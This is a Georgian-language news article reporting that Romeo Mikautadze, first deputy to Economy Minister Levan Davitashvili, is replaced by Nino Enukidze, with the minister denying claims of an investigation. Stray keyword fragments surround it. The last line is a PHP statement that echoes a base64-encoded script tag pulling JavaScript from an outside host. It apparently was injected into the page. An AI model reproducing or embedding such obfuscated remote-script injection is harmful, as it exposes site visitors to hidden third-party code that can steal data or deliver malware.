celsiusi
ავერსი შნაიდერი

პირველი ვიცე-პრემიერის, ეკონომიკისა და მდგრადი განვითარების მინისტრის, ლევან დავითაშვილის პირველი მოადგილე რომეო მიქაუტაძე ნინო ენუქიძემ ჩაანაცვლა, რომელიც მანამდე მოადგილის თანამდებობას იკავებდა - ამის შესახებ ინფორმაციას მთავრობის ადმინისტრაციის პრესსამსახურმა 11 თებერვლის დილას გაავრცელა.

მინისტრი, ლევან დავითაშვილი ტელეკომპანიას ,,იმედის" ეთერში ამბობს, რომ მიქაუტაძემ თანამდებობა საკუთარი სურვილით დატოვა და ის, კერძო სექტორში ინაცვლებს.

„ეს მორიგი სიცრუე და სიყალბეა, რომელსაც სამწუხაროდ, ზოგიერთი მედია საშუალება მიმართავს-ხოლმე. მსგავსი რამ არ არსებობს. რომეო მიქაუტაძემ თავისი სურვილით გადაწყვიტა, რომ არ გაეგრძელებინა მუშაობა.

ის თითქმის, 20 წელია ენერგეტიკის სფეროში მუშაობს და სამინისტროში ენერგეტიკას კურირებდა. მისი სურვილი იყო, ამ ეტაპზე კერძო სექტორში გაეგრძელებინა მუშაობა. ამაზე ჩვენ გარკვეული ხანი გვქონდა საუბარი. ასე, რომ აბსოლუტურად უსაფუძვლოა და სპეკულაციებია ის, რომ მის მიმართ რაიმე გამოძიება მიდიოდა ან ჩვენ ერთად მუშაობის გაგრძელება არ გვსურდა გუნდში. ეს არ იყო. პირიქით, ეს იყო მისი პირადი გადაწყვეტილება“, - განაცხადა დავითაშვილმა ,,იმედი ლაივის" ეთერში.

216
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");